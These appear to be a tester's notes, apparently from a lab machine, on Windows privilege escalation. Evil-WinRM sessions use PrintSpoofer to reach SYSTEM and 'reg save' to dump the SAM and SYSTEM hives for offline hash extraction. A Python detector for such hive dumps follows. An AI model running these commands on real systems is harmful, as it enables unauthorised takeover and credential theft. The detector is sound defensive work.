 Privilege Escalation
- SeImpersonatePrivilege: for this I use PrintSpoofer.exe
- https://juggernaut-sec.com/seimpersonateprivilege/
- https://www.hackingarticles.in/windows-privilege-escalation-seimpersonateprivilege/
```
*Evil-WinRM* PS C:\temp> .\PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.3453]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

*Evil-WinRM* PS C:\temp> dir

    Directory: C:\temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/6/2025   3:07 AM          27136 PrintSpoofer.exe
-a----          6/6/2025   3:07 AM           7168 shell.exe

*Evil-WinRM* PS C:\temp> .\PrintSpoofer.exe -i -c "c:\temp\shell.exe"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```
SeBackupPrivilege/SeRestorePrivilege: when we have these two privileges, we can already use xct's SeRestoreAbuse, which is available as an .exe, to exploit SeRestorePrivilege.
```
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
```
And now, if it is SeBackupPrivilege, I use reg save to save the ntds:
```
*Evil-WinRM* PS C:\temo> reg save hklm\system c:\temo\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\temo> reg save hklm\sam c:\temo\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\temo>
```
Then transfer them to the local machine to read the important files with Impacket's secretsdump.
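The detection-side counterpart of the `reg save` hive dump above, as an added example that is my own and not from the page: it scans constructed process-creation records (the key=value field layout is an assumption, loosely modelled on Sysmon/4688 fields) and alerts on `reg save` or `reg export` of the SAM, SYSTEM or SECURITY hives, which goes slightly beyond the page by also covering `export` and the SECURITY hive.

```python
import re

# Constructed sample records, not real telemetry; field names are assumed.
SAMPLE_LOG = """\
2025-06-06T03:07:10Z host=DC01 user=CICADA\\emily.oscars image=C:\\Windows\\System32\\reg.exe cmd="reg save hklm\\system c:\\temo\\system.hive"
2025-06-06T03:07:12Z host=DC01 user=CICADA\\emily.oscars image=C:\\Windows\\System32\\reg.exe cmd="reg  save HKLM\\SAM c:\\temo\\sam.hive"
2025-06-06T03:08:00Z host=DC01 user=CICADA\\emily.oscars image=C:\\Windows\\System32\\reg.exe cmd="reg query hklm\\software\\microsoft\\windows nt\\currentversion"
2025-06-06T03:09:30Z host=WS01 user=CICADA\\svc_backup image=C:\\Windows\\System32\\reg.exe cmd="REG.EXE EXPORT HKEY_LOCAL_MACHINE\\SECURITY c:\\users\\public\\sec.reg"
2025-06-06T03:10:00Z host=WS01 user=CICADA\\alice image=C:\\Windows\\System32\\reg.exe cmd="reg add hkcu\\software\\foo /v bar /t reg_sz /d 1"
"""

# key=value pairs; a double-quoted value (the command line) is taken whole.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# reg save / reg export of the hives secretsdump consumes; tolerates reg.exe,
# repeated spaces, HKLM vs HKEY_LOCAL_MACHINE, and mixed case.
HIVE_DUMP_RE = re.compile(
    r'\breg(?:\.exe)?\s+(save|export)\s+"?(?:hklm|hkey_local_machine)\\(sam|system|security)\b',
    re.IGNORECASE,
)


def parse_records(text):
    """Turn each key=value log line into a dict; quotes around cmd are stripped."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = {"ts": line.split(" ", 1)[0]}
        for key, value in FIELD_RE.findall(line):
            rec[key] = value.strip('"')
        records.append(rec)
    return records


def detect_hive_dumps(text):
    """One alert per command line that saves or exports SAM, SYSTEM or SECURITY."""
    alerts = []
    for rec in parse_records(text):
        m = HIVE_DUMP_RE.search(rec.get("cmd", ""))
        if m:
            alerts.append({"ts": rec["ts"], "host": rec.get("host"), "user": rec.get("user"),
                           "verb": m.group(1).lower(), "hive": m.group(2).lower(),
                           "cmd": rec["cmd"]})
    return alerts


if __name__ == "__main__":
    for a in detect_hive_dumps(SAMPLE_LOG):
        print(f'{a["ts"]} {a["host"]} {a["user"]} reg {a["verb"]} {a["hive"]}: {a["cmd"]}')
```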
Transfer